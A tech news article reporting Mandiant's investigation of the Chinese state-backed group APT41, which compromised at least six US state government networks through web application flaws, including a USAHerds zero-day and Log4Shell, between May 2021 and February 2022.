IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

China-backed hackers compromised six US government networks

Mandiant researchers investigated APT41 activities between May 2021 and February 2022

Chinese hackers belonging to the state-backed APT41 group compromised at least six US government networks by exploiting vulnerabilities in internet-facing applications. 

The vulnerabilities included a zero-day in the USAHerds application and the Log4Shell flaw in the ubiquitous Java logger Log4j, according to cyber security firm Mandiant, which was this week acquired by Google. The company responded to an APT41 intrusion targeting a US state government computer network in May 2021 and studied the group's activity until February 2022.

APT41 is a prolific Chinese state-sponsored espionage group known to for targeting organisations in both the public and private sectors and for conducting financially motivated activity for personal gain.

Although the goals of APT41’s latest campaign remain unknown, Mandiant’s investigations revealed a variety of new techniques and malware variants used by the hackers.

During the period of investigation, Mandiant found that APT41 successfully compromised at least six US state government networks through the exploitation of vulnerable internet-facing web applications, often written in ASP .NET. In most of the compromises, APT41 carried out .NET deserialization attacks, although Mandiant also observed the group exploiting SQL injection and directory traversal vulnerabilities.

In one instance, APT41 gained access through an SQL injection vulnerability in a proprietary web application but Mandiant detected and contained the activity. However, two weeks later, APT41 re-compromised the network by exploiting a previously unknown zero-day vulnerability in a commercial-off-the-shelf (CoTS) application, USAHerds.

In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also compromised a separate, unrelated agency in the same state.

Mandiant added that the hacking group was quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while also maintaining existing operations.

“On December 10th, 2021, the Apache Foundation released an advisory for a critical remote code execution (RCE) vulnerability in the commonly used logging framework Log4J,” wrote the researchers. “Within hours of the advisory, APT41 began exploiting the vulnerability to later compromise at least two US state governments as well as their more traditional targets in the insurance and telecommunications industries.”

Mandiant said that in late February 2022, APT41 re-compromised two previous US state government victims. This closely aligns with APT41’s May-December 2021 activity, representing a continuation of their campaign into 2022 and demonstrating their unceasing desire to access state government networks, said the company. 

Mandiant underlined that the goals of the campaign are currently unknown, although it has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII).

“Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” stated the researchers.

Members of APT41 were charged by the US Department of Justice (DoJ) in September 2020 in connection with computer intrusion campaigns against over 100 victim companies.

The DoJ said their intrusion facilitated the theft of source code, software code signing certificates, customer account data, and valuable business information. It added these intrusions facilitated the defendants’ other criminal schemes, like ransomware or crypto-jacking schemes.

Featured Resources

Big data for finance

How to leverage big data analytics and AI in the finance sector

Free Download

Ten critical factors for cloud analytics success

Cloud-native, intelligent, and automated data management strategies to accelerate time to value and ROI

Free Download

Remove barriers and reconnect with your customers

The $260 billion dollar friction problem businesses don't know they have

Free Download

The future of work is already here. Now’s the time to secure it.

Robust security to protect and enable your business

Free Download

Recommended

US lawmakers warn Apple against using Chinese chips in next iPhone
components

US lawmakers warn Apple against using Chinese chips in next iPhone

23 Sep 2022
Australian telco Optus confirms cyber attack involving potential leak of sensitive customer data
cyber attacks

Australian telco Optus confirms cyber attack involving potential leak of sensitive customer data

22 Sep 2022
Draft bill could force AWS, Microsoft, Oracle to change public sector contracts
public cloud

Draft bill could force AWS, Microsoft, Oracle to change public sector contracts

12 Sep 2022
US plans big tech regulatory framework
Policy & legislation

US plans big tech regulatory framework

9 Sep 2022

Most Popular

How to secure your hybrid workforce
Advertisement Feature

How to secure your hybrid workforce

23 Sep 2022
What your hybrid workforce needs from their laptops
Advertisement Feature

What your hybrid workforce needs from their laptops

21 Sep 2022
Why collaboration is key to digital transformation
Sponsored

Why collaboration is key to digital transformation

13 Sep 2022